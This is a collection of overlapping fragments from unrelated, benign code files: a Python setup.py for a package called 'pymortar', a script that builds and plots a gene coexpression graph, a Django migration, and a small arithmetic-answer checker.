"author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python",
"author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python ::",
"import setuptools with open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\",",
"open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\",",
"with open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\",",
"setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming",
"fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(),",
"name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language",
"setuptools with open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\",",
"Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python :: 3\", ],",
"= fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\",",
"as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\",",
"fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description,",
"long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\",",
"description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python :: 3\","
"< len(content_unshared) - 1: # file.write('\\n') # ind += 1 # file.close() #",
"histogram from network import GData from network import Graph # # read the",
"atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network #",
"0 # for line in content_unshared: # file.write(line) # if ind < len(content_unshared)",
"math import numpy as np import pandas as pd import matplotlib.pyplot as plt",
"# ind = 0 # for line in content_unshared: # file.write(line) # if",
"visualizer import histogram from network import GData from network import Graph # #",
"'../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close() #",
"data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data,",
"= line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom in atoms:",
"open(filename, 'w') # ind = 0 # for line in content_unshared: # file.write(line)",
"import os import sys sys.path.append('../../python') from instance import Instance import visualizer import histogram",
"the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') #",
"filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines() #",
"print(len(content_unshared)) # # # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' #",
"import visualizer import histogram from network import GData from network import Graph #",
"= open(filename, 'w') # ind = 0 # for line in content_unshared: #",
"line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom in atoms: #",
"GData from network import Graph # # read the atoms from the file",
"atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the sub",
"# for elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1])))",
"save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w')",
"= 0 # for line in content_unshared: # file.write(line) # if ind <",
"network import Graph # # read the atoms from the file # filename",
"'../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') #",
"n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph from raw data,",
"= '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close()",
"as pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance",
"file # filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content =",
"file.read().splitlines() # file.close() # # content_unshared = [] # # for line in",
"# # for line in content: # tokens = line.split(' ') # atom",
"# # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file =",
"# file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n') # ind",
"elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph #",
"import sys sys.path.append('../../python') from instance import Instance import visualizer import histogram from network",
"plt import os import sys sys.path.append('../../python') from instance import Instance import visualizer import",
"open(filename, 'r') # content = file.read().splitlines() # file.close() # # content_unshared = []",
"= elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph",
"= open(filename, 'r') # content = file.read().splitlines() # file.close() # # content_unshared =",
"# content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network # filename",
"the file # filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content",
"file = open(filename, 'w') # ind = 0 # for line in content_unshared:",
"from the file # filename = 'atoms_unshared.txt' # file = open(filename, 'r') #",
"= '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network')",
"graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False) ax.set_title('Coexpression graph')",
"True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph",
"tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom in",
"content = file.read().splitlines() # file.close() # # content_unshared = [] # # for",
"file.write('\\n') # ind += 1 # file.close() # create a sub coexpression graph",
"= [] # for elt in content: # tokens = elt.split(' ') #",
"graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content =",
"1 # file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min",
"genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() #",
"') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph # filename",
"coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False) ax.set_title('Coexpression",
"= GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph",
"Graph('sub coexpression network') # build graph from raw data, exclude mitochondrial and ribosomal",
"# filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines()",
"# atoms = [] # for elt in content: # tokens = elt.split('",
"the atoms from the file # filename = 'atoms_unshared.txt' # file = open(filename,",
"louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min)",
"1: # file.write('\\n') # ind += 1 # file.close() # create a sub",
"filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the",
"ind += 1 # file.close() # create a sub coexpression graph input_file =",
"') # atom = (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line)",
"#!/usr/bin/python import math import numpy as np import pandas as pd import matplotlib.pyplot",
"import Instance import visualizer import histogram from network import GData from network import",
"graph = Graph('sub coexpression network') # build graph from raw data, exclude mitochondrial",
"'../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0 # for line",
"<gh_stars>1-10 #!/usr/bin/python import math import numpy as np import pandas as pd import",
"[] # # for line in content: # tokens = line.split(' ') #",
"content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network # filename =",
"atoms = [] # for elt in content: # tokens = elt.split(' ')",
"# read the atoms from the file # filename = 'atoms_unshared.txt' # file",
"import math import numpy as np import pandas as pd import matplotlib.pyplot as",
"# tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom",
"+= 1 # file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt'",
"'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close() #",
"filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0 #",
"= 1 score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data",
"# output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub",
"# # # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file",
"[] # for elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0],",
"graph.save(output_file) # display the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors'",
"# file.write('\\n') # ind += 1 # file.close() # create a sub coexpression",
"0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph =",
"# file.close() # # content_unshared = [] # # for line in content:",
"content: # tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) # if",
"Instance import visualizer import histogram from network import GData from network import Graph",
"numpy as np import pandas as pd import matplotlib.pyplot as plt import os",
"in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network",
"print('display the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option,",
"col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False) ax.set_title('Coexpression graph') plt.show()",
"from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges =",
"graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display",
"ind < len(content_unshared) - 1: # file.write('\\n') # ind += 1 # file.close()",
"# for line in content_unshared: # file.write(line) # if ind < len(content_unshared) -",
"sys.path.append('../../python') from instance import Instance import visualizer import histogram from network import GData",
"the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax =",
"content = file.read().splitlines() # file.close() # atoms = [] # for elt in",
"exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp,",
"# graph.save(output_file) # display the coexpression graph print('display the coexpression graph') col_option =",
"os import sys sys.path.append('../../python') from instance import Instance import visualizer import histogram from",
"read the atoms from the file # filename = 'atoms_unshared.txt' # file =",
"file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1",
"'r') # content = file.read().splitlines() # file.close() # # content_unshared = [] #",
"import Graph # # read the atoms from the file # filename =",
"# # content_unshared = [] # # for line in content: # tokens",
"if ind < len(content_unshared) - 1: # file.write('\\n') # ind += 1 #",
"raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True",
"output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression",
"the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False)",
"graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax,",
"sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param",
"(tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # #",
"import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance import Instance",
"as plt import os import sys sys.path.append('../../python') from instance import Instance import visualizer",
"# save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename,",
"file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n') # ind +=",
"exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the",
"content_unshared = [] # # for line in content: # tokens = line.split('",
"coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content",
"pandas as pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from",
"import pandas as pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python')",
"from instance import Instance import visualizer import histogram from network import GData from",
"network import GData from network import Graph # # read the atoms from",
"build graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True",
"# atom = (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) #",
"import numpy as np import pandas as pd import matplotlib.pyplot as plt import",
"# display the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig,",
"elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # #",
"line in content: # tokens = line.split(' ') # atom = (tokens[0], int(tokens[1]))",
"int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # #",
"# atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph # filename =",
"for line in content: # tokens = line.split(' ') # atom = (tokens[0],",
"True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display",
"file.read().splitlines() # file.close() # atoms = [] # for elt in content: #",
"score_min) graph = Graph('sub coexpression network') # build graph from raw data, exclude",
"'w') # ind = 0 # for line in content_unshared: # file.write(line) #",
"# # read the atoms from the file # filename = 'atoms_unshared.txt' #",
"= [] # # for line in content: # tokens = line.split(' ')",
"# create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min",
"# print(len(content_unshared)) # # # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt'",
"= True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression",
"n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt'",
"= 'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close()",
"score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData()",
"# filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines()",
"# file.close() # atoms = [] # for elt in content: # tokens",
"tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression",
"data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph from raw",
"# file = open(filename, 'w') # ind = 0 # for line in",
"for line in content_unshared: # file.write(line) # if ind < len(content_unshared) - 1:",
"int(tokens[1]))) # # # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' #",
"1 score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data =",
"file = open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms =",
"matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance import Instance import",
"= file.read().splitlines() # file.close() # # content_unshared = [] # # for line",
"# if ind < len(content_unshared) - 1: # file.write('\\n') # ind += 1",
"atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt'",
"atom = (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared))",
"pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance import",
"file.close() # # content_unshared = [] # # for line in content: #",
"in content: # tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) #",
"mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges)",
"content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read",
"coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param =",
"coexpression network') # build graph from raw data, exclude mitochondrial and ribosomal genes",
"# for line in content: # tokens = line.split(' ') # atom =",
"= (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) #",
"input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 #",
"- 1: # file.write('\\n') # ind += 1 # file.close() # create a",
"# file = open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms",
"and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param)",
"for elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) #",
"= 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph",
"network') # build graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp",
"# if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save",
"= True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) #",
"'r') # content = file.read().splitlines() # file.close() # atoms = [] # for",
"# content = file.read().splitlines() # file.close() # # content_unshared = [] # #",
"# read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename,",
"ind = 0 # for line in content_unshared: # file.write(line) # if ind",
"# tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the",
"0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min,",
"coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots()",
"len(content_unshared) - 1: # file.write('\\n') # ind += 1 # file.close() # create",
"# file = open(filename, 'r') # content = file.read().splitlines() # file.close() # #",
"data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build",
"'../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 # output_file =",
"in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # #",
"= '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0 # for",
"display the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax",
"# # # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file",
"the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') #",
"Graph # # read the atoms from the file # filename = 'atoms_unshared.txt'",
"network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind =",
"# ind += 1 # file.close() # create a sub coexpression graph input_file",
"graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the coexpression graph') col_option",
"filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines() #",
"file.close() # atoms = [] # for elt in content: # tokens =",
"# filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0",
"# build graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp =",
"graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges",
"# content = file.read().splitlines() # file.close() # atoms = [] # for elt",
"# content_unshared = [] # # for line in content: # tokens =",
"line in content_unshared: # file.write(line) # if ind < len(content_unshared) - 1: #",
"graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the coexpression graph')",
"sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind",
"np import pandas as pd import matplotlib.pyplot as plt import os import sys",
"if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the",
"# file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min =",
"filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the coexpression",
"from network import GData from network import Graph # # read the atoms",
"instance import Instance import visualizer import histogram from network import GData from network",
"content_unshared: # file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n') #",
"create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min =",
"= Graph('sub coexpression network') # build graph from raw data, exclude mitochondrial and",
"atoms from the file # filename = 'atoms_unshared.txt' # file = open(filename, 'r')",
"import histogram from network import GData from network import Graph # # read",
"= open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms = []",
"import GData from network import Graph # # read the atoms from the",
"file = open(filename, 'r') # content = file.read().splitlines() # file.close() # # content_unshared",
"= '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 # output_file",
"= 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file,",
"a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005",
"from network import Graph # # read the atoms from the file #",
"# # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file =",
"ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions()",
"in content_unshared: # file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n')",
"GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph from",
"as np import pandas as pd import matplotlib.pyplot as plt import os import",
"graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7",
"open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms = [] #",
"= file.read().splitlines() # file.close() # atoms = [] # for elt in content:",
"read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r')",
"exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file)",
"sys sys.path.append('../../python') from instance import Instance import visualizer import histogram from network import"
] |
[
"migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField(",
"Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver',",
"# Generated by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class",
"Generated by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration):",
"on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails',",
"<reponame>SamirM-BE/ErasMail # Generated by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations",
"[ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver', new_name='owner', ), ]",
"class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders',",
"= [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver', new_name='owner', ),",
"dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver', new_name='owner',",
"from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations",
"2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'),",
"Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies =",
"import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [",
"3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [",
"06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ]",
"by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies",
"django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations ="
] |
[
"while c != 0: c -= 1 num1, sign1, num2, sign2, ans =",
"sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans",
"int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans =",
"= 0 if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1",
"correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans - int(ans)) print(f\"E{answer}ou!\")",
"0 if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1 ==",
"\"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1)",
"correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer =",
"= int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r'",
"1 num1, sign1, num2, sign2, ans = input().split() correct_ans = 0 if sign1",
"+ int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans",
"num1, sign1, num2, sign2, ans = input().split() correct_ans = 0 if sign1 ==",
"int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r' *",
"0: c -= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans =",
"if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\":",
"correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif",
"elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1)",
"int(input()) while c != 0: c -= 1 num1, sign1, num2, sign2, ans",
"\"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer",
"c -= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans = 0",
"= int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2)",
"-= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans = 0 if",
"- int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans",
"correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1) -",
"input().split() correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1) + int(num2)",
"== \"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) * int(num2)",
"ans = input().split() correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1)",
"else: correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans - int(ans))",
"sign2, ans = input().split() correct_ans = 0 if sign1 == \"+\": correct_ans =",
"num2, sign2, ans = input().split() correct_ans = 0 if sign1 == \"+\": correct_ans",
"= int(input()) while c != 0: c -= 1 num1, sign1, num2, sign2,",
"sign1, num2, sign2, ans = input().split() correct_ans = 0 if sign1 == \"+\":",
"sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) *",
"c != 0: c -= 1 num1, sign1, num2, sign2, ans = input().split()",
"int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else:",
"int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans -",
